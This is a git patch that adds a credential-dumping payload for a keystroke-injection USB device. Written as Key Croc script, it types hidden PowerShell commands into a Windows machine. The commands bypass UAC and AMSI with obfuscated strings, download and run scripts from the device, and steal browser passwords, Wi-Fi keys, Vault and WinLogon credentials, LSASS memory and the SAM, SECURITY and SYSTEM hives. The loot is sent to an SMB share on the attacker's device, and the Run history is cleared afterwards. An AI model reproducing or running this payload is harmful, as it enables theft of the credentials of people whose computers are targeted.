From 9d9b205f5a32f9601473445f5450214e4914af0a Mon Sep 17 00:00:00 2001 From: cerebro11 Date: Sat, 1 Aug 2020 22:15:44 +0200 Subject: [PATCH] Create win_dumpcreds.txt --- .../credentials/DumpCreds/win_dumpcreds.txt | 171 ++++++++++++++++++ 1 file changed, 171 insertions(+) create mode 100644 library/credentials/DumpCreds/win_dumpcreds.txt diff --git a/library/credentials/DumpCreds/win_dumpcreds.txt b/library/credentials/DumpCreds/win_dumpcreds.txt new file mode 100644 index 0000000..afac188 --- /dev/null +++ b/library/credentials/DumpCreds/win_dumpcreds.txt @@ -0,0 +1,171 @@ +# Title: DumpCreds +# Author: cerebro11 +# Date: 01/08/2020 +# +# Description: Dumps the usernames & plaintext passwords from +# Browsers (Chrome, FireFox) +# Windows Vault +# Wi-Fi +# sam, system, security from Registry => SAM Hashes (only if AdminMode=True) +# LSASS dump => Mimikatz Dump (only if AdminMode=True) +# System Information +# Creds : Payload based on DumpCreds by QDBA +# +# Get-ChromeDump.ps1 should be downloaded from "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-ChromeDump.ps1" and placed in "/tools/DumpCreds/" +# Get-FoxDump.ps1 should be downloaded from "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-FoxDump.ps1" and placed in "/tools/DumpCreds/" +# Out-Minidump.ps1 should be downloaded from "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1" and placed in "/tools/DumpCreds/" +# Requirements: Impacket, gohttp + +MATCH __dumpcreds + +LOOTDIR=/root/loot/dumpcreds + +# Specify target's PC keyboard language +#export DUCKY_LANG=fr + +# Switch to ETHERNET ATTACKMODE (Windows) +if [ ! -f "/tmp/vidpid" ] +then + ATTACKMODE RNDIS_ETHERNET HID VID_0X1234 PID_0X5678 +else + VENDOR=$(cat /tmp/vidpid | cut -d: -f1) + PRODUCT=$(cat /tmp/vidpid | cut -d: -f2) + ATTACKMODE RNDIS_ETHERNET HID VID_0X$VENDOR PID_0X$PRODUCT +fi +QUACK DELAY 5000 + +# Get KeyCroc's LAN IP +croc_ip=$(ifconfig usb0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) +SHARE="\\\\${croc_ip}\\s" + +# Loot directory +timestamp=$(date +%s) +mkdir -p ${LOOTDIR}/${timestamp} + +# Temporary www and smb directories +mkdir -p /tmp/www +mkdir -p /tmp/smb + +# Prepare scripts +cp -r /tools/DumpCreds/* /tmp/www/ + +# Start HTTP and SMB servers +sleep 2 +cd /tmp/www/ && gohttp -p 80 & +sleep 2 +python /tools/impacket/examples/smbserver.py s /tmp/smb -smb2support & + +# Launch cmd as admin (red window) +QUACK LOCK +QUACK GUI-r +QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f /k mode con lines=1 cols=500' -Verb runAs\"" +QUACK ENTER +QUACK DELAY 200 + +# Bypass UAC :: Change "ALT y" and "ALT n" according to your language i.e. for us it is ALT y (Yes) and ALT n (No) +# If Admin, UAC prompt will open and Alt y will be used (Alt n won't do anything), if not Admin, Alt n will be used to dismiss (Alt y won't do anything) + +QUACK DELAY 500 +QUACK ALT-y +QUACK DELAY 200 +QUACK ENTER + +QUACK DELAY 500 +QUACK ALT-n +QUACK DELAY 200 +QUACK ENTER + +# Start Attack +# Launch powershell and extract systeminfo +sleep 2 +QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass" +QUACK ENTER +QUACK STRING "[Ref].Assembly.GetType('Sy'+'stem.Managem'+'ent.Aut'+'omation.Am'+'s'+'iUt'+'ils').GetField('a'+'m'+'si'+'In'+'itFa'+'iled','No'+'nPub'+'lic,Static').SetValue(\$null,\$true)" +QUACK ENTER +QUACK STRING "\$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\")" +QUACK ENTER +QUACK STRING "net use $SHARE /user:\"anonymous\" \"\"" +QUACK ENTER +QUACK STRING "systeminfo | Out-file $SHARE\\DumpCreds_systeminfo.txt" +QUACK ENTER +QUACK DELAY 200 + +# Extract Chrome, Firefox Data +QUACK STRING "IEX (New-Object Net.Webclient).DownloadString('http://${croc_ip}/Get-ChromeDump.ps1');" +QUACK ENTER +QUACK STRING "Stop-Process -name chrome -ErrorAction SilentlyContinue -Force; sleep 10; Get-ChromeDump -OutFile $SHARE\\DumpCreds_ChromeDump.txt" +QUACK ENTER +QUACK DELAY 200 +QUACK STRING "IEX (New-Object Net.Webclient).DownloadString('http://${croc_ip}/Get-FoxDump.ps1');" +QUACK ENTER +QUACK STRING "Stop-Process -name firefox -ErrorAction SilentlyContinue -Force; sleep 10; Get-FoxDump -OutFile $SHARE\\DumpCreds_FoxDump.txt" +QUACK ENTER +QUACK DELAY 200 + +# Extract Wi-Fi Data +QUACK STRING "(netsh wlan show profiles) | Select-String \"\:(.+)\$\" | %{\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"^.+Cont.+\\W+\\:(.+)\$\" | %{\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | Format-Table -AutoSize | Out-File $SHARE\\DumpCreds_WiFiDump.txt" +QUACK ENTER +QUACK DELAY 200 + +# Extract Windows Credentials from PasswordVault and WinLogon registry +QUACK STRING "[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { \$_.RetrievePassword();\$_ } | Out-File $SHARE\\DumpCreds_VaultDump.txt" +QUACK ENTER +QUACK DELAY 200 +QUACK STRING "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\" | findstr /i \"DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername\" | Out-File $SHARE\\DumpCreds_WinLogon.txt" +QUACK ENTER +QUACK DELAY 200 + +# If Admin, dump memory of lsass.exe and sam/security/system registries (!WARNING TAKES TIME TO COMPLETE!#) +QUACK STRING "if (\$isAdmin) { IEX (New-Object Net.Webclient).DownloadString('http://${croc_ip}/Out-Minidump.ps1');}" +QUACK ENTER +QUACK STRING "if (\$isAdmin) { Get-Process lsass | Out-Minidump -DumpFilePath $SHARE}" +QUACK ENTER +QUACK DELAY 200 +QUACK STRING "if (\$isAdmin) { reg.exe save hklm\\sam $SHARE\\sam }" +QUACK ENTER +QUACK STRING "if (\$isAdmin) { reg.exe save hklm\\security $SHARE\\security }" +QUACK ENTER +QUACK STRING "if (\$isAdmin) { reg.exe save hklm\\system $SHARE\\system }" +QUACK ENTER +QUACK DELAY 200 + +QUACK STRING "echo EXFILTRATION_COMPLETE > $SHARE\\EXFILTRATION_COMPLETE" +QUACK ENTER + +# Remove Run History +QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" +QUACK ENTER +QUACK DELAY 200 +QUACK STRING "exit" +QUACK ENTER +QUACK UNLOCK + +# Wait until files are done copying. +while ! [ -f /tmp/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done + +# Start Cleanup +sleep 2 +# Delete Exfil file +rm /tmp/smb/EXFILTRATION_COMPLETE +# Move data to loot directory +mv /tmp/smb/* ${LOOTDIR}/${timestamp} + +# Clean up temporary directories +rm -rf /tmp/www/ +rm -rf /tmp/smb/ + +# Stop HTTP and SMB servers +kill $(ps -C "gohttp -p 80" -o pid --no-headers) +kill $(ps -C "python /tools/impacket/examples/smbserver.py s /tmp/smb -smb2support" -o pid --no-headers) + +# Deactivate ETHERNET ATTACKMODE +if [ ! -f "/tmp/vidpid" ] +then + ATTACKMODE HID VID_0X1234 PID_0X5678 +else + VENDOR=$(cat /tmp/vidpid | cut -d: -f1) + PRODUCT=$(cat /tmp/vidpid | cut -d: -f2) + ATTACKMODE HID VID_0X$VENDOR PID_0X$PRODUCT +fi + +# Complete